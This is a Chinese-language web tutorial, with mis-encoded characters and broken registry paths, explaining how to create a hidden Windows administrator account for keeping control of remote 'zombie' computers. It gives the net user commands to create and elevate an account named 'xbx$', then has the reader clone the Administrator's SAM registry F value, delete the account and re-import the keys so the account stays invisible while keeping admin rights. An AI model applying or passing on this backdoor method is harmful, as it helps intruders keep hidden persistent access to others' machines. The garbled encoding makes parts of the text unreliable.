以前很流行de一句話叫肉機(jī)其實(shí)要想控制遠(yuǎn)端de計(jì)算機(jī),那我想就少不了隱藏用戶帳號(hào)de問(wèn)題了,其實(shí)創(chuàng)建隱藏用戶帳號(hào)還是比較簡(jiǎn)單de,現(xiàn)在我就把創(chuàng)建隱藏用戶帳號(hào)告訴大家。
其實(shí)每一個(gè)用戶帳號(hào)在注冊(cè)表中都有自己帳號(hào)數(shù)據(jù)項(xiàng):
首先我們看看管理員在注冊(cè)表中de數(shù)據(jù)項(xiàng)是什么樣de(如下圖)
操作1、打開(kāi)注冊(cè)表:HKEY_LOCAL_MACHINESAMSAM
SAM是保存用戶帳號(hào)de地方,不過(guò)這個(gè)項(xiàng)在默認(rèn)情況下是不可見(jiàn)de。我們?nèi)绻肟磧?nèi)部de內(nèi)容就必須首先對(duì)其授權(quán)。(建議對(duì)注冊(cè)表不是很熟悉de朋友不要隨便改動(dòng)注冊(cè)表)
操作2、認(rèn)識(shí)注冊(cè)表中de帳號(hào)分類(lèi)
在OS中de用戶帳號(hào)無(wú)論是內(nèi)置帳號(hào),還是后建帳號(hào),在注冊(cè)表中都能看見(jiàn)。不過(guò)有兩個(gè)帳號(hào)大家一定要能夠認(rèn)識(shí),那就是管理員帳號(hào)和guest帳號(hào)。(如下圖)
在這個(gè)圖中000001fa4表示de是管理員帳號(hào),即使管理員帳號(hào)被重命名了這個(gè)值也是不會(huì)變de,所以我們可以通過(guò)這個(gè)值來(lái)判斷,重命名后de管理員帳號(hào)。
000001fa5表示de是guest帳號(hào),同樣這個(gè)值也不會(huì)因?yàn)椋瑏?lái)賓帳號(hào)給重命名而改變。剩下de其
它值基本上就是后來(lái)創(chuàng)建de用戶帳號(hào),生成值了。
認(rèn)識(shí)了注冊(cè)表后,現(xiàn)在我們就來(lái)利用net user命令創(chuàng)建帳號(hào)了,創(chuàng)建隱藏帳號(hào)必須在CMD下。利用這組命令de,如果不熟悉這個(gè)命令使用de朋友可以參照我de另外一篇文章,就是有關(guān)常見(jiàn)命令de時(shí)候,不過(guò)這些命令也可以在OSde幫助中找到。
操作3、利用net user命令創(chuàng)建帳號(hào)
一、先建立隱藏用戶 xbx$
1、 net user xbx$ 123,abc /add
這里de意思是說(shuō),建立個(gè)xbx$ 帳戶密碼是123,abc(如下圖)
1、 C:Documents and SettingsAdministrator>net localgroup administrators xbx$ /add
這里de意思是說(shuō)把xbx$用戶添加到管理組,以便讓我們創(chuàng)建用戶具備管理員權(quán)限。
一、觀察注冊(cè)表中de變化,并對(duì)注冊(cè)表做相應(yīng)de修改。
HKEY_LOCAL_MACHINESAMSAM
1、找到我們剛剛創(chuàng)建de用戶帳號(hào)(如圖)
在這幅圖中我們可以看見(jiàn)000003f6就是我們剛新建立dexbx$帳號(hào)。
2、 在注冊(cè)表中多帳號(hào)權(quán)限復(fù)制
找到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers
這個(gè)項(xiàng),打開(kāi)000001f4項(xiàng),然后再打開(kāi)F(如下圖)
然后將這里面de值,全選,粘帖并覆蓋到000003f6deF值.
3、 導(dǎo)出注冊(cè)表值
現(xiàn)在將注冊(cè)表中de000001f4、000003f6和xbx$這三項(xiàng)注冊(cè)表值導(dǎo)出并保存好。(如下圖)
4、 刪除帳號(hào)
接下來(lái)我們?cè)俅芜M(jìn)入CMD中刪除xbx$帳號(hào)。
刪除帳號(hào)后,則注冊(cè)表中de值也就沒(méi)有了,這個(gè)時(shí)候我們?cè)侔褎偛艑?dǎo)出de注冊(cè)表項(xiàng),導(dǎo)入到注冊(cè)表中。
這個(gè)時(shí)候我們打開(kāi)本地計(jì)算機(jī)用戶和組就看不見(jiàn)xbx$帳號(hào)了,但是我們卻可以使用該帳號(hào)登錄計(jì)算機(jī),并且具備管理員權(quán)限。
上海廣樂(lè)網(wǎng)絡(luò)科技有限公司 
滬ICP備14038021號(hào)-2 版權(quán)所有. 上海市市轄區(qū)浦東新區(qū)盛夏路666號(hào)盛銀大廈E棟 13151091625
